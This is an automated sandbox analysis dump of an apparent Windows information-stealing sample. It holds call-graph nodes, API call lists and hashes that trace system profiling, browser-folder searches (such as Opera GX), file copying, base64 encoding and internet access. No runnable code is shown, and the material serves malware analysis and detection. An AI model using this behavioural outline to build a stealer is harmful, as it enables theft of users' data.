92008->92009 92010 4119e8 K32GetModuleFileNameExA CloseHandle 92008->92010 92011 40fe20 lstrcpy 92009->92011 92010->92009 92012 411a15 92011->92012 92012->91444 92143 4101a0 GetProcessHeap HeapAlloc RegOpenKeyExA 92013->92143 92015 410f09 92016 410f10 92015->92016 92017 410f1a RegOpenKeyExA 92015->92017 92016->91465 92018 410f52 RegCloseKey 92017->92018 92019 410f3b RegQueryValueExA 92017->92019 92018->91465 92019->92018 92021 411091 92020->92021 92022 4111ae 92021->92022 92023 411099 CoSetProxyBlanket 92021->92023 92024 40fe20 lstrcpy 92022->92024 92025 4110cc 92023->92025 92026 4111c4 92024->92026 92025->92022 92027 4110d4 92025->92027 92026->91479 92027->92026 92028 411102 VariantInit 92027->92028 92029 411126 92028->92029 92147 410f70 CoCreateInstance 92029->92147 92031 411135 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 92032 40fe20 lstrcpy 92031->92032 92033 411193 VariantClear 92032->92033 92033->91479 92035 411251 92034->92035 92036 411259 CoSetProxyBlanket 92035->92036 92037 411314 92035->92037 92039 41128c 92036->92039 92038 40fe20 lstrcpy 92037->92038 92040 41132a 92038->92040 92039->92037 92041 411294 92039->92041 92040->91493 92041->92040 92042 4112be VariantInit 92041->92042 92043 4112e2 92042->92043 92153 4115f0 LocalAlloc CharToOemW 92043->92153 92045 4112eb 92046 40fe20 lstrcpy 92045->92046 92047 4112f9 VariantClear 92046->92047 92047->91493 92048->91521 92050 40fe20 lstrcpy 92049->92050 92051 410c23 92050->92051 92051->91536 92053 40fe20 lstrcpy 92052->92053 92054 4103a8 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 92053->92054 92055 4104a2 92054->92055 92061 4103e7 92054->92061 92056 4104b0 92055->92056 92057 4104a9 LocalFree 92055->92057 92056->91550 92057->92056 92058 4103f0 GetLocaleInfoA 92058->92061 92059 40ffe0 lstrlen lstrcpy lstrcat 92059->92061 92060 40ff00 lstrcpy 92060->92061 92061->92055 92061->92058 92061->92059 92061->92060 92062->91563 92064 410332 wsprintfA 92063->92064 92065 41035b 92063->92065 92064->92065 92065->91578 92067 410515 RegQueryValueExA 92066->92067 92068 41052c RegCloseKey 92066->92068 92067->92068 92068->91595 92070 4105ac 92069->92070 92074 4105f2 92069->92074 92071 4105b0 GetLastError 92070->92071 92082 4105c3 92070->92082 92071->92070 92073 410654 92071->92073 92076 41065e 92073->92076 92157 4113f0 GetProcessHeap HeapFree 92073->92157 92156 4113f0 GetProcessHeap HeapFree 92074->92156 92075 41061b 92077 410625 wsprintfA 92075->92077 92078 41066d 92075->92078 92076->91609 92077->91609 92078->91609 92083 410648 92082->92083 92084 4105de GetLogicalProcessorInformationEx 92082->92084 92154 4113f0 GetProcessHeap HeapFree 92082->92154 92155 411410 GetProcessHeap HeapAlloc 92082->92155 92083->91609 92084->92071 92084->92074 92085->91623 92158 4113a0 92086->92158 92089 4106c0 wsprintfA 92089->91637 92092 40fe20 lstrcpy 92091->92092 92093 410728 EnumDisplayDevicesA 92092->92093 92094 4107e2 92093->92094 92096 410755 92093->92096 92094->91656 92095 40ffe0 lstrlen lstrcpy lstrcat 92095->92096 92096->92095 92097 40ff00 lstrcpy 92096->92097 92098 4107bd EnumDisplayDevicesA 92096->92098 92097->92096 92098->92094 92098->92096 92100 40fe20 lstrcpy 92099->92100 92101 410ad8 CreateToolhelp32Snapshot Process32First 92100->92101 92102 410b09 Process32Next 92101->92102 92103 410b88 CloseHandle 92101->92103 92102->92103 92106 410b1b 92102->92106 92103->91669 92104 40ffe0 lstrlen lstrcpy lstrcat 92104->92106 92105 40ff00 lstrcpy 92105->92106 92106->92104 92106->92105 92107 410b76 Process32Next 92106->92107 92107->92103 92107->92106 92109 40fe20 lstrcpy 92108->92109 92110 410832 RegOpenKeyExA 92109->92110 92111 410869 92110->92111 92124 410898 92110->92124 92112 40fe60 lstrcpy 92111->92112 92114 410877 92112->92114 92113 4108a0 RegEnumKeyExA 92115 4108ce wsprintfA RegOpenKeyExA 92113->92115 92113->92124 92114->91683 92117 410913 RegQueryValueExA 92115->92117 92118 410a7b RegCloseKey RegCloseKey 92115->92118 92116 410a41 RegCloseKey 92119 410a4f 92116->92119 92120 410943 lstrlen 92117->92120 92121 410a2c RegCloseKey 92117->92121 92118->92119 92122 40fe60 lstrcpy 92119->92122 92120->92121 92120->92124 92121->92124 92123 410a59 92122->92123 92123->91683 92124->92113 92124->92116 92124->92121 92125 4109ac RegQueryValueExA 92124->92125 92126 40ffe0 lstrlen lstrcpy lstrcat 92124->92126 92127 40ff00 lstrcpy 92124->92127 92125->92121 92125->92124 92126->92124 92127->92124 92129 415412 92128->92129 92130 40ff00 lstrcpy 92129->92130 92131 41545d 92130->92131 92132 40ff00 lstrcpy 92131->92132 92133 41547b 92132->92133 92134 40ff00 lstrcpy 92133->92134 92135 415487 92134->92135 92136 40ff00 lstrcpy 92135->92136 92137 415493 92136->92137 92138 4154b3 CreateThread WaitForSingleObject 92137->92138 92139 41549b 92137->92139 92140 40fe20 lstrcpy 92138->92140 92160 413e10 92138->92160 92141 4154a0 Sleep 92139->92141 92142 4154e7 92140->92142 92141->92138 92141->92141 92142->91705 92144 4101e5 RegQueryValueExA 92143->92144 92145 4101fb RegCloseKey 92143->92145 92144->92145 92146 41020b 92145->92146 92146->92015 92148 410f97 SysAllocString 92147->92148 92149 410ffe 92147->92149 92148->92149 92150 410fa8 92148->92150 92149->92031 92151 410ffa SysFreeString 92150->92151 92152 410fde _wtoi64 SysFreeString 92150->92152 92151->92149 92152->92151 92153->92045 92154->92082 92155->92082 92156->92075 92157->92076 92159 4106aa GlobalMemoryStatusEx 92158->92159 92159->92089 92169 4100c0 92160->92169 92162 413e3f lstrlen 92166 413e5a 92162->92166 92168 413e4f 92162->92168 92163 40fe60 lstrcpy 92163->92166 92165 40ff00 lstrcpy 92165->92166 92166->92163 92166->92165 92167 413f09 StrCmpCA 92166->92167 92170 404e40 92166->92170 92167->92166 92167->92168 92169->92162 92171 40fe60 lstrcpy 92170->92171 92172 404e7e 92171->92172 92173 404430 5 API calls 92172->92173 92174 404e8a 92173->92174 92379 411720 92174->92379 92176 404eba 92177 404ec5 lstrlen 92176->92177 92178 404ed5 92177->92178 92179 411720 4 API calls 92178->92179 92180 404ee3 92179->92180 92181 40fe20 lstrcpy 92180->92181 92182 404ef3 92181->92182 92183 40fe20 lstrcpy 92182->92183 92184 404f04 92183->92184 92185 40fe20 lstrcpy 92184->92185 92186 404f15 92185->92186 92187 40fe20 lstrcpy 92186->92187 92188 404f26 92187->92188 92189 40fe20 lstrcpy 92188->92189 92190 404f37 StrCmpCA 92189->92190 92191 404f5b 92190->92191 92192 404f87 92191->92192 92195 404f76 InternetOpenA 92191->92195 92193 411450 2 API calls 92192->92193 92194 404f92 92193->92194 92195->92192 92204 4057d5 92195->92204 92206 40fe60 lstrcpy 92204->92206 92380 411733 CryptBinaryToStringA 92379->92380 92381 41172c 92379->92381 92382 411769 92380->92382 92383 41174e GetProcessHeap HeapAlloc 92380->92383 92381->92176 92382->92176 92383->92382 92384 411771 CryptBinaryToStringA 92383->92384 92384->92176 92393->91712 92395 406dac 92394->92395 92716 406c70 92395->92716 92397 406dbf 92397->91761 92719 406ae0 92716->92719 92718 406c98 92718->92397 92720 406af3 92719->92720 92721 406afb 92719->92721 92720->92718 92736 4065a0 92721->92736 92723 406b1b 92738 4065ac 92736->92738 92737 4065b3 92737->92723 92738->92737 92739 40660d 92738->92739 93707 6caeb694 93708 6caeb6a0 ___scrt_is_nonwritable_in_current_image 93707->93708 93737 6caeaf2a 93708->93737 93710 6caeb6a7 93711 6caeb796 93710->93711 93712 6caeb6d1 93710->93712 93720 6caeb6ac ___scrt_is_nonwritable_in_current_image 93710->93720 93754 6caeb1f7 IsProcessorFeaturePresent 93711->93754 93741 6caeb064 93712->93741 93715 6caeb6e0 __RTC_Initialize 93715->93720 93744 6caebf89 InitializeSListHead 93715->93744 93716 6caeb7b3 ___scrt_uninitialize_crt __RTC_Initialize 93718 6caeb6ee ___scrt_initialize_default_local_stdio_options 93723 6caeb6f3 _initterm_e 93718->93723 93719 6caeb79d ___scrt_is_nonwritable_in_current_image 93719->93716 93721 6caeb828 93719->93721 93722 6caeb7d2 93719->93722 93724 6caeb1f7 ___scrt_fastfail 6 API calls 93721->93724 93758 6caeb09d _execute_onexit_table _cexit ___scrt_release_startup_lock 93722->93758 93723->93720 93726 6caeb708 93723->93726 93728 6caeb82f 93724->93728 93745 6caeb072 93726->93745 93733 6caeb86e dllmain_crt_process_detach 93728->93733 93734 6caeb83b 93728->93734 93729 6caeb7d7 93759 6caebf95 __std_type_info_destroy_list 93729->93759 93730 6caeb70d 93730->93720 93732 6caeb711 _initterm 93730->93732 93732->93720 93736 6caeb840 93733->93736 93735 6caeb860 dllmain_crt_process_attach 93734->93735 93734->93736 93735->93736 93738 6caeaf33 93737->93738 93760 6caeb341 IsProcessorFeaturePresent 93738->93760 93740 6caeaf3f ___scrt_uninitialize_crt 93740->93710 93761 6caeaf8b 93741->93761 93743 6caeb06b 93743->93715 93744->93718 93746 6caeb077 ___scrt_release_startup_lock 93745->93746 93747 6caeb07b 93746->93747 93748 6caeb082 93746->93748 93771 6caeb341 IsProcessorFeaturePresent 93747->93771 93751 6caeb087 _configure_narrow_argv 93748->93751 93750 6caeb080 93750->93730 93752 6caeb095 _initialize_narrow_environment 93751->93752 93753 6caeb092 93751->93753 93752->93750 93753->93730 93755 6caeb20c ___scrt_fastfail 93754->93755 93756 6caeb218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 93755->93756 93757 6caeb302 ___scrt_fastfail 93756->93757 93757->93719 93758->93729 93759->93716 93760->93740 93762 6caeaf9e 93761->93762 93763 6caeaf9a 93761->93763 93764 6caeb028 93762->93764 93766 6caeafab ___scrt_release_startup_lock 93762->93766 93763->93743 93765 6caeb1f7 ___scrt_fastfail 6 API calls 93764->93765 93767 6caeb02f 93765->93767 93768 6caeafb8 _initialize_onexit_table 93766->93768 93769 6caeafd6 93766->93769 93768->93769 93770 6caeafc7 _initialize_onexit_table 93768->93770 93769->93743 93770->93769 93771->93750 93772 6cab35a0 93773 6cab35c4 InitializeCriticalSectionAndSpinCount getenv 93772->93773 93788 6cab3846 __aulldiv 93772->93788 93774 6cab38fc strcmp 93773->93774 93787 6cab35f3 __aulldiv 93773->93787 93776 6cab3912 strcmp 93774->93776 93774->93787 93776->93787 93777 6cab35f8 QueryPerformanceFrequency 93777->93787 93778 6cab38f4 93779 6cab3622 _strnicmp 93781 6cab3944 _strnicmp 93779->93781 93779->93787 93780 6cab376a QueryPerformanceCounter EnterCriticalSection 93782 6cab37b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 93780->93782 93785 6cab375c 93780->93785 93783 6cab395d 93781->93783 93781->93787 93782->93785 93786 6cab37fc LeaveCriticalSection 93782->93786 93784 6cab3664 GetSystemTimeAdjustment 93784->93787 93785->93780 93785->93782 93785->93786 93785->93788 93786->93785 93786->93788 93787->93777 93787->93779 93787->93781 93787->93783 93787->93784 93787->93785 93789 6caeb320 5 API calls ___raise_securityfailure 93788->93789 93789->93778 93790 6cab3060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 93795 6caeab2a 93790->93795 93794 6cab30db 93799 6caeae0c _crt_atexit _register_onexit_function 93795->93799 93797 6cab30cd 93798 6caeb320 5 API calls ___raise_securityfailure 93797->93798 93798->93794 93799->93797 93800 6cacc930 GetSystemInfo VirtualAlloc 93801 6cacc9a3 GetSystemInfo 93800->93801 93808 6cacc973 93800->93808 93803 6cacc9b6 93801->93803 93804 6cacc9d0 93801->93804 93803->93804 93806 6cacc9bd 93803->93806 93807 6cacc9d8 VirtualAlloc 93804->93807 93804->93808 93805 6cacc99b 93806->93808 93811 6cacc9c1 VirtualFree 93806->93811 93809 6cacc9ec 93807->93809 93810 6cacc9f0 93807->93810 93816 6caeb320 5 API calls ___raise_securityfailure 93808->93816 93809->93808 93817 6caecbe8 GetCurrentProcess TerminateProcess 93810->93817 93811->93808 93816->93805 93818 6caeb9c0 93819 6caeb9ce dllmain_dispatch 93818->93819 93820 6caeb9c9 93818->93820 93822 6caebef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 93820->93822 93822->93819 93823 6caeb830 93824 6caeb86e dllmain_crt_process_detach 93823->93824 93825 6caeb83b 93823->93825 93827 6caeb840 93824->93827 93826 6caeb860 dllmain_crt_process_attach 93825->93826 93825->93827 93826->93827

                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                            Function 004185A0 Relevance: 68.5, APIs: 34, Strings: 5, Instructions: 208libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 555 4185a0-4185b2 LoadLibraryA 556 4187c7-418826 LoadLibraryA * 5 555->556 557 4185b8-4187c2 GetProcAddress * 21 555->557 558 418828-418836 GetProcAddress 556->558 559 41883b-418842 556->559 557->556 558->559 561 418844-41886a GetProcAddress * 2 559->561 562 41886f-418876 559->562 561->562 563 418878-418886 GetProcAddress 562->563 564 41888b-418892 562->564 563->564 565 418894-4188a2 GetProcAddress 564->565 566 4188a7-4188ae 564->566 565->566 567 4188b0-4188d5 GetProcAddress * 2 566->567 568 4188da 566->568 567->568
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,004184AA), ref: 004185A5
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00E2A8A0), ref: 004185C0
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AA98), ref: 004185ED
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AAB0), ref: 00418606
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2A960), ref: 0041861E
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2A978), ref: 00418636
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2E4F0), ref: 0041864F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33B78), ref: 00418667
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33918), ref: 0041867F
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AB58), ref: 00418698
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AAF8), ref: 004186B0
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AB70), ref: 004186C8
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AA08), ref: 004186E1
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33938), ref: 004186F9
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2A888), ref: 00418711
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2A8B8), ref: 0041872A
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33978), ref: 00418742
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AA38), ref: 0041875A
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2AAC8), ref: 00418773
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33B18), ref: 0041878B
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E2A930), ref: 004187A3
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(74DD0000,00E33BF8), ref: 004187BC
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E2A9D8), ref: 004187CD
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E2AA20), ref: 004187DF
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E2A8D0), ref: 004187F1
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E2A918), ref: 00418802
                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00E2A948), ref: 00418814
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00E2A990), ref: 00418830
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00E2AA50), ref: 0041884C
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00E2AA80), ref: 00418864
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00E2AB88), ref: 00418880
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75450000,00E33BB8), ref: 0041889C
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76E90000,00E2E490), ref: 004188B8
                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004188CF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                            • String ID: 89$NtQueryInformationProcess$kernel32.dll$x9$x;
                                                                                                                                                                                                                                                                            • API String ID: 2238633743-3846931612
                                                                                                                                                                                                                                                                            • Opcode ID: 7266dee1e8cedc60a2977318b2278b4377f0c83288a22ad4706934660cf6d17d
                                                                                                                                                                                                                                                                            • Instruction ID: bda799d21cc2b01bfb12709a94fee26cd9c3543f1087e7d92f23403565ae61c8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7266dee1e8cedc60a2977318b2278b4377f0c83288a22ad4706934660cf6d17d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 199144BDA00620EFE754DFA4ED48A2637BBF74AB01B146529EA05C7374E774A841CB60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 004164A0 Relevance: 54.6, APIs: 26, Strings: 5, Instructions: 322stringfileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memset$strtok_swsprintf$lstrcat$FileFindFirstMatchPathSpec
                                                                                                                                                                                                                                                                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                                                                            • API String ID: 1425701045-3225784412
                                                                                                                                                                                                                                                                            • Opcode ID: f9a939fed25fb007d3cd6773e4f62d57578648204a3180eca1f04e510bea48cb
                                                                                                                                                                                                                                                                            • Instruction ID: 90e794690816a6f02978cdac63616847133c7af68286edecf0343b1f7787fe60
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9a939fed25fb007d3cd6773e4f62d57578648204a3180eca1f04e510bea48cb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78C1FDB5900218ABDF10DFA4DC85EEE7779EF48704F10455EF515A3281E738AE88CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 0040D320 Relevance: 49.9, APIs: 20, Strings: 8, Instructions: 907fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 1437 40d320-40d3e2 call 40fe20 call 40ff50 call 40ffe0 call 40ff00 call 40fea0 * 2 call 40fe20 * 2 call 4100c0 FindFirstFileA 1456 40d3e4-40d418 call 40fea0 * 4 1437->1456 1457 40d41d-40d429 1437->1457 1481 40df6a-40dfb5 call 40fea0 * 5 1456->1481 1458 40d430-40d444 StrCmpCA 1457->1458 1460 40df19-40df29 FindNextFileA 1458->1460 1461 40d44a-40d45e StrCmpCA 1458->1461 1460->1458 1464 40df2f-40df66 FindClose call 40fea0 * 4 1460->1464 1461->1460 1463 40d464-40d4f0 call 40feb0 call 40ff50 call 40ffe0 * 2 call 40ff00 call 40fea0 * 3 1461->1463 1506 40d656-40d6ed call 40ffe0 * 4 call 40ff00 call 40fea0 * 3 1463->1506 1507 40d4f6-40d50c call 4100c0 StrCmpCA 1463->1507 1464->1481 1556 40d6f3-40d712 call 40fea0 call 4100c0 StrCmpCA 1506->1556 1512 40d512-40d5af call 40ffe0 * 4 call 40ff00 call 40fea0 * 3 1507->1512 1513 40d5b4-40d651 call 40ffe0 * 4 call 40ff00 call 40fea0 * 3 1507->1513 1512->1556 1513->1556 1565 40d8e8-40d8fe StrCmpCA 1556->1565 1566 40d718-40d72c StrCmpCA 1556->1566 1568 40d900-40d95c call 401120 call 40fe60 * 3 call 40cf10 1565->1568 1569 40d96c-40d981 StrCmpCA 1565->1569 1566->1565 1567 40d732-40d863 call 40fe20 call 411450 call 40ffe0 call 40ff50 call 40ff00 call 40fea0 * 3 call 4100c0 * 2 CopyFileA call 40fe20 call 40ffe0 * 2 call 40ff00 call 40fea0 * 2 call 40fe60 call 406e80 1566->1567 1744 40d8b1-40d8e3 call 4100c0 DeleteFileA call 410070 call 4100c0 call 40fea0 * 2 1567->1744 1745 40d865-40d8ac call 40fe60 call 401120 call 4153e0 call 40fea0 1567->1745 1624 40d961-40d967 1568->1624 1571 40d983-40d99b call 4100c0 StrCmpCA 1569->1571 1572 40d9f8-40da13 call 40fe60 call 411610 1569->1572 1584 40d9a1-40d9a5 1571->1584 1585 40de8b-40de92 1571->1585 1594 40da15-40da19 1572->1594 1595 40da8f-40daa4 StrCmpCA 1572->1595 1584->1585 1591 40d9ab-40d9f6 call 401120 call 40fe60 * 2 1584->1591 1589 40de94-40defb call 40fe60 * 2 call 40fe20 call 401120 call 40d320 1585->1589 1590 40df06-40df16 call 410070 * 2 1585->1590 1654 40df00 1589->1654 1590->1460 1642 40da6d-40da7f call 40fe60 call 407440 1591->1642 1594->1585 1603 40da1f-40da6a call 401120 call 40fe60 call 40fe20 1594->1603 1600 40daaa-40db5b call 40fe20 call 40ffe0 call 40ff00 call 40fea0 call 411450 call 40ff50 call 40ff00 call 40fea0 * 2 call 4100c0 * 2 CopyFileA 1595->1600 1601 40dccc-40dce1 StrCmpCA 1595->1601 1702 40db61-40dc2b call 401120 call 40fe60 * 3 call 407bd0 call 401120 call 40fe60 * 3 call 408730 1600->1702 1703 40dc2d 1600->1703 1601->1585 1610 40dce7-40dd98 call 40fe20 call 40ffe0 call 40ff00 call 40fea0 call 411450 call 40ff50 call 40ff00 call 40fea0 * 2 call 4100c0 * 2 CopyFileA 1601->1610 1603->1642 1707 40de68-40de7a call 4100c0 DeleteFileA call 410070 1610->1707 1708 40dd9e-40ddfb call 401120 call 40fe60 * 3 call 407fc0 1610->1708 1624->1585 1660 40da84-40da8a 1642->1660 1654->1590 1660->1585 1709 40dc33-40dc49 call 4100c0 StrCmpCA 1702->1709 1703->1709 1727 40de7f 1707->1727 1764 40de00-40de62 call 401120 call 40fe60 * 3 call 408330 1708->1764 1722 40dc4b-40dca7 call 401120 call 40fe60 * 3 call 408dc0 1709->1722 1723 40dcad-40dcbf call 4100c0 DeleteFileA call 410070 1709->1723 1722->1723 1746 40dcc4-40dcc7 1723->1746 1733 40de82-40de86 call 40fea0 1727->1733 1733->1585 1744->1565 1745->1744 1746->1733 1764->1707
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00426A8A,00426A87,00000000,?,00426BC8,?,?,00426A86,?,00000000,00000005), ref: 0040D3D4
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426BCC), ref: 0040D43C
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426BD0), ref: 0040D456
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00426BD4,?,?,00426A8B), ref: 0040D504
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
